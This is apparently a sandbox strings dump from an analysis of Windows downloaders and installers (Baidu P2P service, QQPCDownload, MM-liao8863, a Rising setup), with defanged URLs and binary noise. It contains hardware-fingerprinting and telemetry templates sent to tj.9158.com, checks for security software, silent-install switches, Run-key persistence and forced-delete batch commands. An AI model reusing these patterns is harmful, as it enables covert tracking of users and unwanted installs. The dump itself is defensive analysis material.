%s : read at %I64u(%I64u), no data, return, index=%u, %I64i

%s : -------------------------------------------------- first buffering time=%d, DLed=%I64i

%s : ****************************************************** buffering time=%d

%s : read at %I64u(%I64u), return %i, available=%I64i, 0xx,0xx,0xx,0xx, index=%u,%I64i

%s : peer %s read callback at %I64u,%I64i,%I64i(%i), not ready

%s : peer %s read callback at %I64u(%i), ready

%s : DUP, uid=%I64i, pid=%d, kid=%I64i, total=%I64i

%s : DATA uid=%I64i, pid=%d, kid=%I64i, length=%I64i, avail=%I64i

add reserve state : peer id=%I64i, blockid=%d

REQ uid=%I64i, pid=%d, kid=%d

%s : delete task, index=%u

%s : start p2s, index=%u

%s : stop p2s, index=%u

%s : delete p2p task

%s : create share memory fail, error=%d

%s : start task, index=%u

%s : find resume file

%s : load resume file success

%s : file removed

%s : p2s finish code = %d

%s : filesize = %I64d, full hash length=%d

%s : no p2p fid, choose P2S

%s : no hash array

%s : send full hash done

%s : check url done, code=%d

%s : forbidden

%s : network error

%s : stop task, index=%u

%s : AddEmergencyRange(%I64i,%I64i) %I64i

%s : SetPriorityWindow(%I64i,%I64i)

%s : disk full

%s : create file error, error=%d

%s : rename fail

%s : rename success

%s : add p2p share

%s : task complete

%s : no hash array, need report to server

%s : zero hash at %i, rehash

%s : total verify success, report and add share

%s : total verify fail

%s : complete download ,but not complete verify, recheck

%s : send finish info, range count=%d,verified range=%I64i, total=%I64i

%s : create disk file fail

%s : try write hash piece failed: %I64i - %I64i

%s : memory verify success: %I64i(%I64i)

%s : memory verify fail: %I64i(%I64i)

%s : write piece success: %I64i - %I64i

%s : write piece fail: %I64i - %I64i

%s : disk verify success at %I64i(%i)

%s : disk verify fail at %I64i(%i)

%s : GetTaskInfo

%s : peers_add=%d, peers_total=%d, seeders=%d, downloaders=%d

%s : GetInternalState

%s : GetTaskStatistics

%s : GetBlockInfo

%d total,%I64i(%I64i), %d%%

%s : set task state, state=%d, error=%d

%s : set file size = %I64i

%s : load verify range at %I64i(%i)

%s : load data at %I64i(%i)

%s : on finish range,peer %I64i

%s : alloc %I64i-%I64i,peer %I64i

%s : p2s peer %I64i connected

%s : p2s peer %I64i leave

%s : p2s peer %I64i ready to request : %I64i-%I64i

%s : peer %I64i leave

recv calc verify response, block id=%d, from %I64i

crc at %I64i wrong piece %d, find bad boy

%s : may upload bad data, peer id=%I64i

%s : create p2p task fail, already exists

make a decision, for speed = %dKB/s > 150KB/s

make a decision, for elapse 10 seconds, speed = %dKB/s

choose P2S, P2S=%d KB/s, %s

choose P2P, P2S=%d KB/s

call delete_p2p_task, %u

dup url, url=%s

new task, url=%s

ref=%s

tmp=%s

the same task id %d

create task, index=%u

StopTaskAsync: %u

StopTaskSync: %u

fid=%s, url=%s

tasks.dat exist, do not check tasks.ini

read tasks.ini from %s

acctrack.kuaibo.com

acc.p2sp.baidu.com

0.0.0.0

dudpxp://

[DUDPXP]

index.html

%%%2X

hXXp://

PTF://

%s:%s@

%s%s%s%s%s

hXXp:///

hXXp://%s:%d/%s

cmp2s.p2sp.baidu.com

query?cmd=url2finfo

query?cmd=fid2finfo

query?cmd=validurl

commit?cmd=finfo

P2SCfg.ini

Port

%s %s HTTP/1.1

Content-Length: %d

d:\cygwin\home\scmpf\compiler_src\panfeng02_563106_win32\0\app\gensoft\p2p\client\platform\objs\BaiduP2PService.pdb

P2PBase.dll

?StatAdd@CP2PStatReport@@QAEX_K0@Z

?StatAdd@CP2PStatReport@@QAEX_KQAE@Z

?StatAdd@CP2PStatReport@@QAEX_KPAEI@Z

?SendReport@CP2PStatReport@@QAEHXZ

??1CP2PStatReport@@QAE@XZ

??0CP2PStatReport@@QAE@PBD000@Z

P2PStatReport.dll

P2SBase.dll

GetProcessHeap

KERNEL32.dll

RegisterHotKey

UnregisterHotKey

USER32.dll

GDI32.dll

RegCloseKey

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

ShellExecuteW

SHELL32.dll

OLEAUT32.dll

SHLWAPI.dll

WS2_32.dll

iphlpapi.dll

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

WINTRUST.dll

VERSION.dll

GetConsoleOutputCP

GetCPInfo

.?AV?$FieldVector@VURL@p2s@@@serial@@

.?AVP2SValidUrl@p2s@@

zcÁ

g\Xbdyy.dll

\bdupdate.exe

\autoupdate.ini

\banner.jpg

\Baidu\BaiduPlayer\bdupdate.exe

\Baidu\BaiduPlayer\autoupdate.ini

\Baidu\BaiduPlayer\banner.jpg

\BaiduPlayer.exe

&Version=%d.%d.%d.%d

&LangID=%d

!\Cabinet.dll

@.exe

\bugreport.exe

bdbugreport_%u

CPU : Arch=%d, Type=%d, Level=%d, Rev=%d, No.=%d

MemoryPool : Total=%d, Free=%d

User : Lang=%d,LCID=%d ; System : Lang=%d,LCID=%d

Memory Corruption : %s

"%s" --smname=%s

CryptQueryObject failed with %x

CryptMsgGetParam failed with %x

Program Name : %s

Publisher Link : %s

MoreInfo Link : %s

CertFindCertificateInStore failed with %x

Signer Certificate:

TimeStamp Certificate:

Date of TimeStamp : d/d/d d:d

CertGetNameString failed.

Issuer Name: %s

Subject Name: %s

CryptDecodeObject failed with %x

The file "%s" is signed and the signature was verified.

The file "%s" is not signed.

An unknown error occurred trying to verify the signature of the "%s" file.

Error is: 0x%x.

\platform_%d.log

\platform.log

\platform_crush_%d.log

\platform_quit_%d.log

%sV%u

\running.pid

SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}

BaiduP2PService.exe

FTP://

HTTP://

\qqwry.dat

.bdre

.bdtp

\Baidu\BaiduPlayer\Service.ini

f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNet

Global\f182cd1a-751e-4a90-9153-cbf3eb0e2040-mnbvcxzBDExit

f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNetMutex

F=>%p, S=>%d

d\P2PBase.dll

\P2SBase.dll

\P2PStatReport.dll

\StatReport.exe

Global\0531f939-e126-410c-8e44-dc1c0b375a79_%u

BufferPercent=%d

State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(%6.2f%%),S=I64i,Dup=%I64i(%6.2f%%),R=I64i,DV/MV/DE/ME=%d/%d/%d/%d,EM=%I64i,H=%u

State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(00%%),S=I64i,Dup=%I64i(0.00%%),R=I64i,H=%u

Q=%d, FH=%d,P=%d, B=%d,P2P=%u,SCnt=%u,QDat=%dKB,QSta=%d,QSpe=%d,FID=%s Name=%s

Pending== Partial==/=, F=}/}/}, DT=%d, RC=%d,DA=%d, WP=%I64i,WD=%I64i

%6I64iK,%6I64iK,%s,AReq/ARes=%6u/%6u,RP=%d,LP=%d,RTT/RTO=M/M,W==,Q==,P==,LAN=%d,C=%d,R=-,NAT=-,V=MKB/s

WAdd=%u.%u.%u.%u:%u(%s)

LAddr=%u.%u.%u.%u:%u

EAddr=%u.%u.%u.%u:%u

Ver=%u.%u.%u.%u

Reserve=%d

UID=%I64i,Sta=%d,StaNext=%d,Retry=%d,MP=]/] KB,D=M/M KB/s,U=M/M KB/s,%s

Self:%s(%d),P2P:%s(%d),P2S:%s(%d),Stat:%s(%d),Tcps=-,Port=%u,Err=%u,Up=%d,Alloc==,Wr=M,Bitmap=-,WC==,AC==,RQ=-

\Baidu\BaiduPlayer\tasks.dat

\Baidu\BaiduPlayer\tasks.ini

field%d

\assfile.dll

\ManagerStub.dll

Test Fail, Error=%d, r2=%d

MyBDHotkey1

MyBDHotkey

MyBDHotkeyVer

CKernel32.dll

/commonlib.dll

%Program Files%\tools\BaiduP2PService.exe

"%Program Files%\tools\BaiduP2PService.exe"

Baidu.com, Inc.

1,0,14,43

QQPCDownload71960.exe_2776:

.text

`.rdata

@.data

.rsrc

aSSSh

FTPjK

FtPj;

C.PjRV

.mixcrt

KERNEL32.DLL

mscoree.dll

portuguese-brazilian

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

kernel32.dll

operator

GetProcessWindowStation

USER32.DLL

%s>

%s="%s"

%s='%s'

version="%s"

encoding="%s"

standalone="%s"

lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt

d:\QQPCDownloader_proj\PackageTools\product\win32\dbginfo\kpacket.pdb

KERNEL32.dll

USER32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

GetProcessHeap

GetCPInfo

GetConsoleOutputCP

zcÁ

.?AUICryptoSetPassword@@

.?AVCCryptoGetTextPassword@N7z@NArchive@@

.?AUICryptoGetTextPassword@@

Hummer Setup EXE

%s%s_d_%x

setup.xml

A%s%s

%s_d_%x

%s%s%s

%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe

MM-liao8863.exe_2808:

.text

`.rdata

@.data

.rsrc

SSSSh

FtPh

tGHt.Ht&

OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"

OnDocumentComplete: URL="%s"

OnProgressChange: progress=%d, progress_max=%d

OnNavigationComplete2: URL="%s"

OnStatusTextChange: text="%s"

OnTitleChange: text="%s"

C:\Windows\Temp\temp.icon

c://temp.icon

ProExe

DownloadUrl

ErrorUrl

AdvertUrl

XieyiUrl

hXXp://tj.9158.com/Opendownloadernewxml.aspx

(3-!0,1'8"5.*2$

DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d

**** DISK_GEOMETRY_EX for drive %d ****

Disk is%s fixed

%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0

**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****

Vendor Id = [%s]

Product Id = [%s]

Product Revision = [%s]

Serial Number = [%s]

%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d

DeviceType: x

DeviceTypeModifier: x

RemovableMedia: %d

CommandQueueing: %d

BusType: %d

%d ReadPhysicalDriveInNTWithZeroRights ERROR

CreateFile(%s) returned INVALID_HANDLE_VALUE

\\.\PhysicalDrive%d

Drive%dType

DriveÜontrollerBufferSize

DriveÜontrollerRevisionNumber

Drive%dSerialNumber

Drive%dModelNumber

Controller Buffer Size on Drive___: %s bytes

Drive Controller Revision Number__: [%s]

Drive Serial Number_______________: [%s]

Drive Model Number________________: [%s]

Drive %d -

%d ReadPhysicalDriveInNTWithAdminRights ERROR

No device found at position %d (%d)

DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d

%d ReadPhysicalDriveInNTUsingSmart ERROR

DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d

Error Code %d

ERROR: Could not open IDE21201.VXD file

\\.\IDE21201.VXD

ERROR: Could not SetPriorityClass, LastError: %d

\\.\Scsi%d:

Hard Drive Model Number___________: %s

Hard Drive Serial Number__________: %s

%s (%s:%d)

D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl

softlist=%s&lmarkid=%s

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028

w@C:\Windows\Temp\

%sDownLoad

_%s%s.exe

_%s.exe

/S /D=%s

%sDownLoad\%s

Browser=%s

&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s

&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s

&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9

hXXp://tj.9158.com/DownloadInsertinfo.aspx?

%ld%s%s

%d*%d

%s(%s)

...%d%c

%Program Files%

%s Inx:%d Offset:%d Len:%d

.tmp.tg

****ERR:%d,

nInx:%d, offset:%d, siz:%d

%d, lRemain

ConnectSvr:%s

X-X-X-X-X-X

SOFTWARE\%s

Microsoft Windows 95

Microsoft Windows NT 4.0

Microsoft Windows 98

Microsoft Windows Me

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows Server 2003 R2

Microsoft Windows Server 2003

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2008

Microsoft Windows Vista

Microsoft Windows Server 2008 R2

Microsoft Windows 7

unknown OperatingSystem.

Web Edition

\StringFileInfo\xx\ProductVersion

\StringFileInfo\xx\ProductName

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

SOFTWARE\Microsoft\Windows NT\CurrentVersion

http\shell\open\command

%s %s

\SogouExe\SogouExe.exe

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input

%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe

%Program Files%\SogouInput\SogouExe\SogouExe.exe

M.exe

deepscan\zhudongfangyu.exe

360safe.exe

ZhuDongFangYu.exe

QQ.exe

T58web

9158web

User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)

HTTP/1.1

%s?log=%s&version=20140121

hXXp://tj.9158.com/logtest.aspx

:%d,server:%s, ip:%s,

:url:%s, server:%s,error msg:%s, errcode:%d

kernel32.dll

CNotSupportedException

hhctrl.ocx

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

Afx:%p:%x:%p:%p:%p

Afx:%p:%x

commctrl_DragListMsg

CCmdTarget

CHttpConnection

CHttpFile

hXXp://

WININET.DLL

HTTP/1.0

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

File%d

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

ntdll.dll

%s%s.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

comctl32.dll

comdlg32.dll

shell32.dll

mfcm90.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp

user32.dll

ole32.dll

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

operator

GetProcessWindowStation

USER32.DLL

F%D,3

OLEACC.dll

SHLWAPI.dll

WSOCK32.dll

GetProcessHeap

GetCPInfo

GetConsoleOutputCP

KERNEL32.dll

GetKeyState

UnhookWindowsHookEx

SetWindowsHookExA

CreateDialogIndirectParamA

USER32.dll

GetViewportExtEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GDI32.dll

COMDLG32.dll

WINSPOOL.DRV

RegCloseKey

RegOpenKeyA

RegCreateKeyExA

RegOpenKeyExA

RegEnumKeyExA

RegDeleteKeyA

RegEnumKeyA

ADVAPI32.dll

ShellExecuteA

ShellExecuteExA

SHELL32.dll

COMCTL32.dll

oledlg.dll

OLEAUT32.dll

GdiplusShutdown

gdiplus.dll

NETAPI32.dll

VERSION.dll

UrlUnescapeA

InternetCrackUrlA

InternetCanonicalizeUrlA

HttpQueryInfoA

HttpSendRequestA

InternetOpenUrlA

HttpOpenRequestA

WININET.dll

.?AVCCmdTarget@@

.PAVCFileException@@

.?AV?$CList@PAVCFTPTask@@AAPAV1@@@

.PAVCException@@

.?AVCFTPTask@@

.?AVCHttpService@@

.?AVCMD5Checksum@@

.PAVCObject@@

.PAVCOleException@@

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.?AVCTestCmdUI@@

.?AVCCmdUI@@

.PAVCUserException@@

.PAVCResourceException@@

.PAVCInternetException@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.PAVCArchiveException@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.PAVCOleDispatchException@@

zcÁ

00000000000000000001

%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe

`R.qB

h/y%DlRZ

J!Ç

yR^y.%U3

/.Ro}!

p)%sQ

CZ%SY

.vyOx

.Pm[

42a%u

O%fWU

%cPqt

F2/%c

C7%SQ5

XU%fR

QN.Ui

IßD

(Bô|

.Qsty

.bYV`

40%sS

%%co\s

P.WGD

2Um

%U2b&0

%se7sQ

[Q.QN]

4g%x=XL$5

.Bsw&wf

uÿQ

R#.oR

45.sSC

OBW2%S2%S2

u\%Cr@

.Pd4{

[K.On

W.eQYT

gB7%U

9~ui.QBv@

J.pEu

\.MdB

accKeyboardShortcut

mscoree.dll

ekernel32.dll

KERNEL32.DLL

DownloadInstall.Document

(*.*)

Output.prn$

(*.prn)|*.prn|

(*.*)|*.*||

1, 0, 0, 1

DownloadInstall.EXE

install1393485.exe_1148:

`.rsrc

\rsdebug.ini

c:\%s

dbghelp.dll

kernel32.dll

d-d-d(d-d-d)

Kernel32.dll

\rsmain.exe

[d-d-d][d:d:d:d]

%s\%s

%s\*.*

C:\Temp

SOFTWARE\Rising\%s

2.log

[u]

[0xX]

RAV.INI

\Rs7zSfx.log

\setup.dll

CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}

%s\CompsVer.inf

Setup.exe

%s\auto.ini

@Sleep...%d

%s Start

%s End

{E5C53971-D80E-4500-BE0D-761BF3CD8457}

Unsupported Method

Password is not defined

mscoree.dll

- This application cannot run using the active version of the Microsoft .NET Runtime

Please contact the application's support team for more information.

GetProcessWindowStation

user32.dll

internal state. The program cannot safely continue execution and must

continue execution and must now be terminated.

CLSID\{CAA2D3B2-4BB5-4a45-A17A-122773379D99}

XXXXXXXXXXX

{X-X-X-XX-XXXXXX}

\NetConfig.ini

{"vkey": "%s", "guid": "%s", "sguid": "%s", "actionid": "%s", "tag": "%s","step": "%s",

"result": "%s", "errorcode": "%s", "remark": "%s", "pa": "%s", "pb": "%s"}

Label.dat

hXXp://center.rising.com.cn/urg.asp?v=%s&t=%s&a=%s

%sbase

Iphlpapi.dll

\\.\PhysicalDrive%d

\\.\Scsi%d:

MSIE %d.%d

WININET.DLL

Windows

Windows Me

Windows 98

Windows 95

Windows NT %d.%d

%s:%d

Mozilla/4.0 (compatible; %s; %s; Rising)

Content-Type: application/x-www-form-urlencoded

HTTP/1.0

C:\DistributedAutoLink\Temp\CompileOutputDir\7zSfx.pdb

COMCTL32.dll

GDI32.dll

restorelog.txt

zcÁ

T3%dU

K.ZuNN

)$OI%f

B.Yo@

26.Ip

up.yF

~mM.Bv

qPndR.Ts

Thawte Certification1

hXXp://ocsp.thawte.com0

.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0

hXXp://ts-ocsp.ws.symantec.com07

hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0

hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(

.Class 3 Public Primary Certification Authority0

hXXp://crl.verisign.com/pca3.crl0

hXXps://VVV.verisign.com/cps0

#hXXp://logo.verisign.com/vslogo.gif04

hXXp://ocsp.verisign.com0>

2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,

hXXp://sf.symcb.com/sf.crl0f

hXXps://d.symcb.com/cps0%

hXXps://d.symcb.com/rpa0

hXXp://sf.symcd.com0&

hXXp://sf.symcb.com/sf.crt0

hXXps://VVV.verisign.com/cps0*

hXXps://VVV.verisign.com/rpa0

#hXXp://crl.verisign.com/pca3-g5.crl04

hXXp://ocsp.verisign.com0

DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0

z.oao

].XcG

~jq.wz

.FDF`O

;.bd/

:U%SN

ej.CC

`X.UT?.

.lqwD

*e_!.sWI$`

]>!.gB

k.Rrt

TCP_yy

%S5]*

.fb#c$Z4

h[%D}_

$T.Ia

V.jurV

Sù,

T%xYS3

9kl.Uw

We]%F

u.zQ0

4\ R%d

.qJ4C9.

T@M.Ng

y.Di

vJY.lNk'1

.Gi#O$@$

~D.Hh

U.LZe

yo.NRL;

.npr =

y/"Z.Jn(

Diurl

A.Ot=_d

.psd x

}.eNk^6E

@%X;g

~gq%c^

;.Aum

_6}"%_^&

36.hU

S}i;%u

$.dls

iY.Ub

%cUNX

EHJJGA[.Oj

S.lW"

.hw1.

.CB5t

.MAF!

|%X3j

.aRSr

".xNT

3.Mh)

X2.Wq

B%.GMK

8&H8.VW

a%s%s

.dk:8e`

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RsdSfxTmp

%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe

.text

`.rdata

@.data

.rsrc

@.reloc

QSVSSSh

>%uPV

|$D.tD

.tgPV

FTPjK

FtPj;

C.PjRVj

u.VV3

|$$vL9|$ u%Sh

Advapi32.dll

Explorer.exe

NtDll.dll

%d %d %d %d

Failed to call WTSQueryUserToken, err= 0x%x

wtsapi32.DLL

Could not open pipe

SetNamedPipeHandleState failed

\\.\pipe\RISING_RSD_BU

%*.*f

/RUNAS %s

Failed to load psapi.dll.

Psapi.dll

Setup.exe End with ErrorCode: 0xX

hXXp://center.rising.com.cn/LogCenter.asp?info=%s

Key=%s&v1=%s&v2=%s&v3=%s&v4=%s&v5=%s

Password

Port

%s\Data\%s\%s.ini

setup.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

%s(%s)

ReportView

KERNEL32.DLL

SetWillReboot(%d)

Failed to call QueryServiceStatus(RSD)! Err Code: %d

Failed to call OpenService(RSD)! Err Code: %d

Failed to call OpenSCManager! Err Code: %d

\RsTest.ini

ÞSKTOP%

\label.dat

\Backup.ini

\Export.ini

\XMLS\RSSetup.xml

\Setup.exe

\*.exe

\XMLS\Setup.xml

\os.xml

/PASS=

/PRODUCT=%s

/LANG=%d

HKEY_LOCAL_MACHINE\SoftWare\Rising\%s

ITEM%d

UPDATEXMLURL

d-d-- d:d

Setup.dll

Local_RSD_Setup_%s

Global\Rising_RSD_Setup_%s

Rising_RSD_Setup_%s

\Backup\RSD\RSSetup\RSSetup.xml

\RSSetup.xml

\CompsVer.inf

AddPCAExclude return: %d

Open Key Failed!

Create Key Failed!

Query Value Failed! Return: %d

%s\Setup.exe

SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags

AddPCAExclude(%d)

Setup.xml

\Setup.xml

12345678.000

Create Temp Cfg From %s to %s

rd /q %s

rd /s /q %s

if exist %s goto repeat

del /s /q /f %s

\DelSelf.bat

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SetFileSecurity() failed. Error %d

SetSecurityDescriptorControl() failed.Error %d

GetSecurityDescriptorControl() failed.Error %d

SetSecurityDescriptorDacl() failed. Error %d

AddAce() failed. Error %d

GetAce() failed. Error %d

AddAccessAllowedAce() failed. Error %d

AddAccessAllowedAceEx() failed. Error %d

advapi32.dll

InitializeAcl() failed. Error %d

HeapAlloc() failed. Error %d

GetAclInformation() failed. Error %d

GetSecurityDescriptorDacl() failed. Error %d

InitializeSecurityDescriptor() failed.Error %d

GetFileSecurity() failed. Error %d

InitializeSid() failed. Error %d

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

WinSessionThread GetPidByName dwPID = %d , name=%s!

WTSQueryUserToken Failed! Err Code: %d

OpenProcess Failed! Err Code: %d

GetProcAddress(OpenProcessToken) Failed! Err Code: %d

OpenProcessToken Failed! Err Code: %d

GetLogonUserToken(%d)

CreateProcess2 Return: %d

LoadLibrary Failed! Err Code: %d

CreateEnvironmentBlock Failed! Err Code: %d

DuplicateTokenEx Failed! Err Code: %d

CreateProcessWithTokenW Failed! Err Code: %d

Userenv.DLL

GetFileAttributes %s return: %d

Delete File %s fail, Err: %d

Wow64DisableWow64FsRedirection Return: %d

Wow64RevertWow64FsRedirection Return: %d

RsInstallService(%s) Return: %d

ChangeServiceConfig Failed! Err Code: %d

CreateService Failed! Err Code: %d

OpenSCManager Failed! Err Code: %d

RsInstallService(%s)

RsUninstallService(%s) Return: %d

DeleteService Failed! Err Code: %d

OpenService Failed And Service Already Exist! Err Code: %d

RsUninstallService(%s)

OpenService Failed! Err Code: %d

LoadLibrary(Advapi32.dll) Failed!

RsSetServiceFailureAction(%s) Return: %d

GetProcAddress(%s) Failed!

ChangeServiceConfig2 Failed! Err Code: %d

RsSetServiceFailureAction(%s)

QueryServiceStatus Failed! Err Code: %d

StartService Failed! Err Code: %d

RsStartService(%s)

Wait for Service %s Time Out!

QueryServiceStatus(%s) Failed! Err Code: %d

ControlService(%s) SERVICE_CONTROL_STOP Failed! Err Code: %d

HeapAlloc Failed! Err Code: %d

EnumDependentServices Failed! Err Code: %d

Stop Service %s Dependencies...

%s's Stop is Pending...

Service %s is Stopped...

OpenService(%s) Failed! Err Code: %d

RsStopService(%s)

Rs%sInstallCom(%s) Return: %d

LoadLibrary(%s) Failed!

%s Failed! ErrMsg: %s

Rs%sInstallCom(%s)...

WinSessionThread CreateProcess ret = %d end !

WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !

WinSessionThread CreateProcess begin dwSessionID = %d!

WININIT.INI

\WININIT.INI

HKEY_CURRENT_CONFIG

"%s" %s

\RsMgrSvc.ini

Save DELETEPATH %s to RsMgrSvc.ini

Save REBOOTRUN %s to RsMgrSvc.ini

%s Loaded By %s

EXPLORER.EXE

Setup.exe Begin----------------------------------

HKEY_DYN_DATA

HKEY_PERFORMANCE_DATA

StopComponent(%s)...

StartComponent(%s)...

Report Error!

Call Component %s Dll_PreHandle Return: 0xX

Call Component %s Dll_PostHandle Return: 0xX

Check XML File %s Failed

Check File %s Failed

BackUp XML File From: %s To %s

Delete XML File: %s

Copy XML File From: %s To %s

%s\RsMgrsvc.ini

URLInfoAbout

hXXp://help.ikaka.com/

"%s" /UNINSTALL /PRODUCT=%s

"%s" /UNINSTALL /PRODUCT=RSD

Delete File %s

Copy File From %s To %s

CompsVer.inf

Copy Path From %s To %s

Down Load %s To Path: %s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run

RunFirstInstall Successfully...NeedReboot: %d

InstallComponentList Failed! Error Code: 0xX

PreHandleComponentList Failed! Error Code: 0xX

Product_PreHandle Failed! Error Code: 0xX

BackUpComponentList Failed! Error Code: 0xX

CheckComponentList Failed! Error Code: 0xX

RunFirstInstall, AfterReboot: %d

RavTmp: %s

file not exist : %s

succeed to download %s

Failed to download %s. ErrCode = %d; hr = %d

Failed to verify %s

%s%s/%s%s.inf

Failed to get download url from %s

URLLIST

Failed to load %s.

%s%s/%s/%s/%s

%s\%s\%s\%s

%s%s/%s/%s

%s\%s\%s

Failed to get %s-ITEM.

Failed to get %s-FILES.

Failed to get %s-COMPONENT.

Download %s retry > 3

%s/%s/%s_xml.zip

%s\%s\%s.xml

%s%s/%s/%s.xml

Failed to get %s' newver from %s

SCMD

REGVERKEY

REGKEYVALUE

REGKEYNAME

REGKEY

Set File %s Everyone Access Rights 0xX return: %d

Set File %s Users Access Rights 0xX return: %d

Delete File Return: %d, NeedReboot: %d

Prepare To Delete File %s...

Back Up File From: %s To: %s Return: %d

Skip Backing Up File %s For Checked OK...

Copy File Return: %d, NeedReboot: %d

MoveFile From %s To %s

Prepare To Copy File From %s To %s...

TaskbarPin = 0x%x

Install Link: %s

Delete Link: %s

TaskbarunPin = 0x%x

Old Link File: %s

SUBKEY

Set Key %s Everyone Access Rights 0xX return: %d

Set Key %s Users Access Rights 0xX return: %d

REGKEYDATATYPE

Install Key KeyName: %s, ValueName: %s, Value: %s, DataType: %d Return: %d

Backup Key Value Return: %d

microsoft\windows\currentversion\run

Restore Key Value Return: %d

UnInstall Key KeyName: %s, ValueName: %s Return: %d

Execute langsel.exe

langsel.exe

Setup Log (*.log)

*.log

A%d M

ÚTADIR%

Need Reboot, Add DeletePath Task To Server: %s

No Reboot, RsDeletePath(%s)

